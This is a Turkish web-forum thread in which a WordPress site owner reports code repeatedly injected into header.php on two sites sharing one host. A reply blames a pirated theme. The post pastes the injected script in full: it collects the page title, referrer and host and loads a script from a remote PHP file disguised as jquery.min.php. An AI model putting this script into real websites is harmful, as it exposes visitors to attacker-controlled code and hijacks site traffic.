shadow06 adlı üyeden alıntı: mesajı görüntüle
Arkadaşlar daha önce açmıştım cevap bulamadım tekrar açıyorum umarım konu doğru yerdedir, değilse moderatör arkadaşlar taşırsa çok sevinirim.

Wordpress bir sitem var ve en güncel versiyonu kullanıyorum sadece 4 tane eklentisi var onlarda hepimizin kullandığı eklentiler zaten.

Bu 2 haftadır aynı hostumda bulunan 2 siteminde header.php kısmına bir kod yerleştiriliyor sadece oraya ama. Ve sitem bu yüzden çok kötü takılıyor ve sorun yaşıyorum.

Tüm wordpress giriş şifrelerimi random değiştirdim, hostung şifrelerimi random değiştirdim, ftp şifrelerini random değiştirdim.

host firması ile iletişim kurdum onlar hosting ile alakalı birşey olmadığını ve hostumdaki dosyların yazma izinleriylede alakalı birşey olmadığını söylediler.

Ben daha fazla ne yapabilirim. bu sorunu nasıl çözebilirim. Yardımcı olursanız çok sevinirim.

siteme eklenen kod

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://studioaldogattoni.it/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
hocam tema w a r * z ise bırakın o temayı